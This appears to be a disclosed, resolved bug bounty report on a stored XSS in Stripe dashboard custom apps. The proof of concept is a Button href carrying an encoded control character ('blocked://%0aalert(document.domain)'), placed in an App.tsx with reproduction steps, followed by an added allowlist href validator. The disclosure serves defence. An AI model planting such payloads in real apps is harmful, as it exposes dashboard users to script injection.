XSS vulnerability without a content security bypass in a `CUSTOM` App through Button tag
Severity: Medium
Program: Stripe
Reported by: saajanbhujel
## Summary:
Hi security team members,
Hope you are well and doing great :)
I found a **possible XSS vulnerability in a `CUSTOM` App through the Button tag, but I was not able to bypass the content security policy.**
This report is similar to my previous report (#1804177). The only difference is that I found the previous issue on a live Stripe App (which uses a `Link` tag, maybe). But here, in this report, I found it possible to create an XSS vulnerability with the help of the `Button` tag.
## Description:
**This occurs when you create a CUSTOM app with the Button tag**, like: `<Button href="blocked://%0aalert(document.domain)">XSS</Button>`
## Steps To Reproduce:
1. Create a demo Custom app through the stripe-cli.
2. Replace your viewport with `"viewport": "stripe.dashboard.drawer.default"` in `stripe-app.json`, so the app works on every page in the dashboard.
3. Copy and paste the code below into your `App.tsx` file:
```tsx
import { ContextView, Button } from "@stripe/ui-extension-sdk/ui";
import type { ExtensionContextValue } from "@stripe/ui-extension-sdk/context";
import BrandIcon from "./brand_icon.svg";

/**
 * This is a view that is rendered in the Stripe dashboard's customer detail page.
 * In stripe-app.json, this view is configured with stripe.dashboard.customer.detail viewport.
 * You can add a new view by running "stripe apps add view" from the CLI.
 */
const App = ({ userContext, environment }: ExtensionContextValue) => {
  return (
    <ContextView
      title="XSS POC"
      brandColor="#F6F8FA" // replace this with your brand color
      brandIcon={BrandIcon} // replace this with your brand icon
    >
      {/* Two buttons whose href carries a percent-encoded line feed / carriage return */}
      <Button href="blocked://%0aalert(123)">
        XSS with %0a
      </Button>
      <Button href="blocked://%0dalert(document.domain)">
        XSS with %0d
      </Button>
    </ContextView>
  );
};

export default App;
```
4. Then run and open your app.
5. Once the app is open, click on the button link. It does not execute because of CSP.
{F2106779}
6. But if you turn off CSP protection with the help of an [extension](https://chrome.google.com/webstore/detail/disable-content-security/ieelmcmcagommplceebfedjlakkhpden), the XSS executes.
{F2106780}
## Video POC:
{F2106781}
## Impact
If an attacker is able to bypass CSP, there is a possible stored XSS vulnerability in https://dashboard.stripe.com.
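The report shows that the href reached the dashboard with its `blocked://` scheme and encoded control characters intact, and that CSP was the only layer left to stop it. The following is an added example, not code from the report or from Stripe's SDK, of the allowlist-style href check a host would apply to link-like elements such as `<Button href=...>`; the report does not say how the dashboard handled the `blocked://%0a...` value, so the check does not model that and simply accepts only schemes it knows. The function names, the scheme allowlist and the sample hrefs are all assumptions constructed for this example.

```javascript
// Added example (not from the report or Stripe's SDK): allowlist validation for
// the href of link-like UI elements. Names and sample data are constructed.

// Only schemes the host is willing to navigate to (assumed allowlist).
const ALLOWED_PROTOCOLS = new Set(["https:", "mailto:"]);

// Raw C0 control characters and DEL. Browsers silently strip tab, LF and CR
// from a URL before detecting its scheme, so the raw string is checked before
// any parsing or decoding happens.
const RAW_CONTROL_RE = /[\u0000-\u001f\u007f]/;
// Their percent-encoded forms (%0a, %0d, %09, ...), rejected as well in case a
// later layer decodes the href before using it.
const ENCODED_CONTROL_RE = /%(?:[01][0-9a-f]|7f)/i;

function isSafeHref(href) {
  if (typeof href !== "string") return false;
  if (RAW_CONTROL_RE.test(href) || ENCODED_CONTROL_RE.test(href)) return false;
  let url;
  try {
    // Absolute URLs only: the WHATWG parser reports the scheme a browser would use.
    url = new URL(href);
  } catch {
    return false; // relative or unparseable hrefs are rejected too
  }
  return ALLOWED_PROTOCOLS.has(url.protocol);
}

// Denylist variant, shown for contrast: it only looks for a literal
// "javascript:" prefix, so an href with any other scheme passes untouched.
function isSafeHrefDenylist(href) {
  return typeof href === "string" && !/^\s*javascript:/i.test(href);
}

// What a host does with a rejected href: render the button with no navigation
// target instead of the supplied one.
function resolveButtonHref(href) {
  return isSafeHref(href) ? href : undefined;
}

// Constructed sample hrefs: the report's two payloads plus ordinary cases.
const SAMPLE_HREFS = [
  "https://dashboard.stripe.com/customers",
  "mailto:support@example.com",
  "blocked://%0aalert(123)",
  "blocked://%0dalert(document.domain)",
  "javascript:alert(1)",
];

// Returns one row per href with the verdict of each check.
function classifyAll(hrefs = SAMPLE_HREFS) {
  return hrefs.map((h) => ({
    href: h,
    allowlist: isSafeHref(h),
    denylist: isSafeHrefDenylist(h),
  }));
}

if (typeof require !== "undefined" && require.main === module) {
  console.table(classifyAll());
}
```

Run stand-alone, the table shows the two `blocked://` payloads passing the denylist check and failing the allowlist one; the allowlist rejects them twice over, once for the encoded control character and once because `blocked:` is not an accepted scheme. CSP remains the second layer behind this check, not a substitute for it.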
## Report Details
State: Closed (Resolved)
Bounty: $2000.00
Weakness: Cross-site Scripting (XSS) - Generic